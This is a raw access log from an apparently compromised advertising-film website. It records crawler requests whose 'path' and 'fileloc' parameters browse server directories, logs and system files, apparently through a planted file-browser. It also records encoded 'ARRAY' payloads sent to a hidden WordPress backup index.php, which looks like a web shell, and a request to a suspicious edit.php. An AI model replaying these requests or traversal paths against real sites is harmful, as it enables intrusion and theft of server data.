74.7.227.51 - - [10/Nov/2025:00:24:09 +0000] "GET /202xcvs2220.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.4.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.19.79.213 - - [10/Nov/2025:00:24:09 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/input/mouse0 HTTP/1.1" 200 3117 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:24:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/subsystem/devices/memory13/subsystem/devices/memory4/power HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:11 +0000] "GET /79lbwyj47449.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:11 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fopp%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fopp HTTP/1.1" 200 2791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:24:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory12/subsystem/devices/memory5 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:12 +0000] "GET /202xcvs2220.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.3.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:12 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fx86%2Fplatform%2Fuv%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fx86%2Fplatform%2Fuv HTTP/1.1" 200 2760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [10/Nov/2025:00:24:13 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733373733332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343133332q3265376634336365653762636338616332383131313538343739356362616561222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.189 - - [10/Nov/2025:00:24:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory15/subsystem/devices/memory15/subsystem/devices/memory4 HTTP/1.1" 200 3409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.84.131.195 - - [10/Nov/2025:00:24:13 +0000] "GET /our-works/tvc-sjc/?path=//etc/polkit-1/localauthority HTTP/1.1" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:13 +0000] "GET /202xcvs2220.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.9.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:14 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fshare%2Fperl%2F5.30.0%2FSymbol.pm&path=%2F%2Fusr%2Fshare%2Fperl%2F5.30.0 HTTP/1.1" 200 4855 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:24:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory15/subsystem/devices/memory15/subsystem/devices/memory1/power HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:15 +0000] "GET /84xqt26880.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:15 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fphp7.4-cli%2FREADME.Debian.security&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fphp7.4-cli HTTP/1.1" 200 3270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:24:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/subsystem/devices/memory15/subsystem/devices/memory6/power HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:17 +0000] "GET /97sls25329.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.195.248.30 - - [10/Nov/2025:00:24:17 +0000] "GET /our-works/tvc-jokky/?path=//usr/share/locale/tr HTTP/1.1" 200 2940 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:24:18 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fnet%2Funix%2FKconfig&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fnet%2Funix HTTP/1.1" 200 3228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:24:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory10/subsystem/devices/memory10/subsystem/devices/memory9 HTTP/1.1" 200 3412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:19 +0000] "GET /49hvqlc18411.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:19 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fextcon HTTP/1.1" 200 3053 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:24:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/subsystem/devices/memory12/subsystem/devices/memory3/power HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:20 +0000] "GET /147ibgwg7971.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.210.114.189 - - [10/Nov/2025:00:24:21 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/doc/fonts-dejavu-core HTTP/1.1" 200 3292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:24:22 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Finclude%2Fconfig%2Fvideo%2Fhexium HTTP/1.1" 200 3077 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:22 +0000] "GET /13wxvwt16179.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:23 +0000] "GET /234wludx4254.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:23 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Finclude%2Fdrm HTTP/1.1" 200 6575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.211 - - [10/Nov/2025:00:24:25 +0000] "GET /?products=1425835710 HTTP/1.1" 200 25912 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:26 +0000] "GET /230smx7050.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.3.127.170 - - [10/Nov/2025:00:24:26 +0000] "GET /our-works/tvc-bia-hello/?path=//var/lib/apache2/module HTTP/1.1" 200 3011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:24:26 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fnet%2Fappletalk HTTP/1.1" 200 3012 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:27 +0000] "GET /195teh5989.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Flib%2Fpython3.9%2Flib2to3%2Ffixes%2Ffix_itertools_imports.py&path=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Flib%2Fpython3.9%2Flib2to3%2Ffixes HTTP/1.1" 200 3416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:30 +0000] "GET /84plau33022.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:30 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fencodings%2Fcp437.py&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fencodings HTTP/1.1" 200 9898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:24:31 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fencodings%2Fcp852.py&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fencodings HTTP/1.1" 200 9638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.193.102.198 - - [10/Nov/2025:00:24:31 +0000] "GET /our-works/tvc-bia-hello/?path=//var/lib/apache2/module HTTP/1.1" 200 3011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:32 +0000] "GET /110ptui9498.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:34 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fpci HTTP/1.1" 200 3274 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [10/Nov/2025:00:24:36 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Ffs%2Fnfs_common HTTP/1.1" 200 3008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:36 +0000] "GET /49hvqlc18411.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:24:37 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733373735372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343135372q3630356262613937333066623636376338643537303230313461373137626137222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
3.225.9.97 - - [10/Nov/2025:00:24:37 +0000] "GET /our-works/tvc-bia-hello/?path=//usr/share/doc/fonts-dejavu-core HTTP/1.1" 200 3292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:24:37 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fdrivers%2Fblock%2Fdrbd HTTP/1.1" 200 3081 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.0 - - [10/Nov/2025:00:24:38 +0000] "GET /?products=1597935942 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
3.220.148.166 - - [10/Nov/2025:00:24:38 +0000] "GET /our-works/tvc-calci/?path=//usr/share/locale/si HTTP/1.1" 200 2940 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:24:39 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Finclude%2Fconfig%2Fspectre HTTP/1.1" 200 3002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:39 +0000] "GET /147ibgwg7971.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu%2Frsyslog%2Flmnet.so&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu%2Frsyslog HTTP/1.1" 200 2663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:41 +0000] "GET /84bmwrr47844.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.3.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.207.69.106 - - [10/Nov/2025:00:24:41 +0000] "GET /our-works/tvc-calci/?path=//usr/share/locale/si HTTP/1.1" 200 2940 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:42 +0000] "GET /13wxvwt16179.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:24:42 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fsamples%2Fmic HTTP/1.1" 200 2993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:24:43 +0000] "GET /230smx7050.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:45 +0000] "GET /147ibgwg7971.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.175.228 - - [10/Nov/2025:00:24:46 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/lsattr&path=//bin HTTP/1.1" 200 2594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:46 +0000] "GET /195teh5989.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:47 +0000] "GET /49hvqlc18411.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.196.237.236 - - [10/Nov/2025:00:24:48 +0000] "GET /our-works/tvc-jokky/?fileloc=//opt/fphp/bin/pear&path=//opt/fphp/bin HTTP/1.1" 200 2989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:49 +0000] "GET /13wxvwt16179.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:50 +0000] "GET /110ptui9498.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:51 +0000] "GET /234wludx4254.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.210.152.179 - - [10/Nov/2025:00:24:52 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/sg_persist&path=//bin HTTP/1.1" 200 2598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:52 +0000] "GET /110ptui9498.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:53 +0000] "GET /110ptui9498.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:54 +0000] "GET /117vulm7343.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [10/Nov/2025:00:24:55 +0000] "GET /wp-includes/addc3d4c/edit.php?id=336228 HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=336228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.51 - - [10/Nov/2025:00:24:55 +0000] "GET /234wludx4254.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.202.88.37 - - [10/Nov/2025:00:24:57 +0000] "GET /our-works/tvc-jokky/?path=//usr/share/fonts/truetype HTTP/1.1" 200 2934 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:24:57 +0000] "GET /84bmwrr47844.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.5.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:58 +0000] "GET /41tabut11855.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:24:59 +0000] "GET /95vmj16591.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:25:00 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733373738302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343138302q3134373331653336323334633236373965613333353233646539323930373963222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:25:00 +0000] "GET /21dal46535.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.209.174.110 - - [10/Nov/2025:00:25:01 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/systemd/catalog/systemd.bg.catalog&path=//lib/systemd/catalog HTTP/1.1" 200 6840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:25:01 +0000] "GET /94xrw35998.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/subsystem/devices/memory13/subsystem/devices/memory1/power HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:25:04 +0000] "GET /14gvpz10042.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.87.62.248 - - [10/Nov/2025:00:25:04 +0000] "GET /our-works/tvc-bia-hello/?path=//proc/sys/kernel/usermodehelper HTTP/1.1" 200 2996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
